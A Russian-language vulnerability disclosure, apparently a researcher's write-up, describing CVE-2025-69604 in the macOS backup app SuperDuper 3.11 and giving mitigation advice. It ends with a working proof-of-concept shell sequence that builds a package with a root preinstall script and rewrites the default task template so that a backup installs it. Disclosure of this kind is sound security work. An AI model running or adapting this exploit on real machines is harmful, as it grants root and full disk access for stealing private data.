
Эксплойт-концепция для CVE-2025-69604, демонстрирующая повышение привилегий через установку вредоносного пакета в задачах резервного копирования SuperDuper на macOS.
Эта уязвимость аналогична описанной в CVE-2025-61229 – злоумышленник может изменить шаблон задачи, чтобы заставить задачи резервного копирования SuperDuper установить произвольный пакет. Затем пакет может запускать сценарии оболочки с правами пользователя root и с самым высоким уровнем доступа к конфиденциальным данным (полный доступ к диску).
Оценка CVSS 3.1: Оценка NVD ожидается.
Чтобы избежать этой уязвимости, удалите приложение SuperDuper! или установите обновление 3.12.
Этот анализ эксплойта и доказательство концепции предоставлены только в образовательных целях. Используйте на свой страх и риск.
В моем предыдущем анализе уязвимости SuperDuper CVE-2025-61229 я обнаружил, что шаблон настроек по умолчанию SuperDuper по-прежнему был небезопасен даже после того, как разработчик устранил эту уязвимость в обновлении SuperDuper 3.11. Это обновление устранило только конкретную уязвимость, описанную в CVE-2025-61229, но не решило проблему того, что злоумышленник может изменить шаблон задачи по умолчанию. По роковому стечению обстоятельств, шаблон задачи включает функциональность установки пакетов, поэтому злоумышленник может изменить шаблон задачи, указав пакет, который может установить программное обеспечение или запустить сценарии оболочки от имени пользователя root и с полным доступом к диску.
Разработчик устранил эту уязвимость, удалив функциональность «установка пакета». Опять же, шаблон настроек задачи все еще может быть изменен злоумышленником, и разработчик даже указал, что это невозможно исправить без раздражения пользователя (т.е. без требования аутентификации пользователя каждый раз при изменении задачи). Похоже, что шаблон задачи по умолчанию останется уязвимым для модификации в обозримом будущем, поскольку разработчик не смог придумать другой способ сделать его более безопасным.
Мой предыдущий вывод стоит повторить: привилегии root и полный доступ к диску — это наивысшие привилегии, которые может получить программное обеспечение на macOS. Любой разработчик, запрашивающий эти привилегии, должен писать программное обеспечение, соответствующее современным принципам и передовым практикам безопасности. Эта уязвимость, а также те, что раскрыты в CVE-2025-57489 и CVE-2025-61228, и даже собственное признание разработчика в том, что эти проблемы сохранялись в течение 22 лет, демонстрируют, что SuperDuper не был спроектирован как безопасный продукт и за 22 года не получил регулярных улучшений дизайна для соответствия современным передовым практикам.
Эта уязвимость эксплуатируется почти таким же образом, как и CVE-2025-61229, поэтому я в основном отошлю к моему предыдущему анализу этой уязвимости здесь. Следующее доказательство концепции демонстрирует эксплуатацию с версией 3.11 SuperDuper:
mkdir -p /tmp/scripts
cd ~; export home=`pwd`; export user=`whoami`
printf '#!/bin/bash\n' > /tmp/scripts/preinstall
printf "ls -l $home/Desktop > /Library/private_data.txt\n" >> /tmp/scripts/preinstall
chmod a+x /tmp/scripts/preinstall
pkgbuild --identifier com.gray.sdexploit --nopayload --scripts /tmp/scripts /tmp/attack.pkg
cd ~/'Library/Application Support/SuperDuper!/Saved Settings/.Default Settings.sdsp'
cp 'Session Settings.sdss' Settings.plist
defaults write "`pwd`"/Settings.plist SDshouldInstallPackage -bool YES
defaults write "`pwd`"/Settings.plist SDinstallerPackage /tmp/attack.pkg
cp Settings.plist 'Session Settings.sdss'
После выполнения этих команд просто запустите резервное копирование с настройками по умолчанию, и attack.pkg будет установлен с привилегиями root и полным доступом к диску. Конечный результат — файл с именем «private_data» в /Library (т.е. доступный для записи только root), содержащий список содержимого вашей папки Desktop (т.е. доступный только коду, работающему с полным доступом к диску).